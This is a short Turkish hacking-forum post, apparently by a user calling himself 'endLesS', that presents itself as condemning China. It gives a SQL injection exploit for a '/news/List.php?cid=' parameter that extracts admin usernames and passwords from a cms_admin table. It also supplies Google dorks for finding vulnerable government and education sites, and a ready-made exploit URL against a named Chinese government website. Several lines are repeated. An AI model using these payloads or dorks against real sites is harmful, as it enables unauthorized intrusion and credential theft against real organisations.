endLesS
Webmaster
çin'i kınamak amaçlıdır.
sözü fazla uzatmadan açığı ve kullanımını veriyim.
Exploit ;
/news/List.php?cid=-65+union+select+concat(username,0x3a,password),2+f rom+cms_admin+limit+0,1--
Google Dork:
inurl:"/news/List.php?cid=" "edu"
gov,edu,net,info v.s Şeklinde genişletilebilir.
sözü fazla uzatmadan açığı ve kullanımını veriyim.
PHP:
http://www.google.com.tr/search?q=inurl:%22/news/List.php%3Fcid%3D%22+%22gov%22&hl=tr&start=10&sa=N
/news/List.php?cid=-65+union+select+concat(username,0x3a,password),2+f rom+cms_admin+limit+0,1--
PHP:
http://www.shuangliu.gov.cn/news/List.php?cid=-65+union+select+concat%28username,0x3a,password%29,2+from+cms_admin+limit+0,1--
inurl:"/news/List.php?cid=" "edu"
gov,edu,net,info v.s Şeklinde genişletilebilir.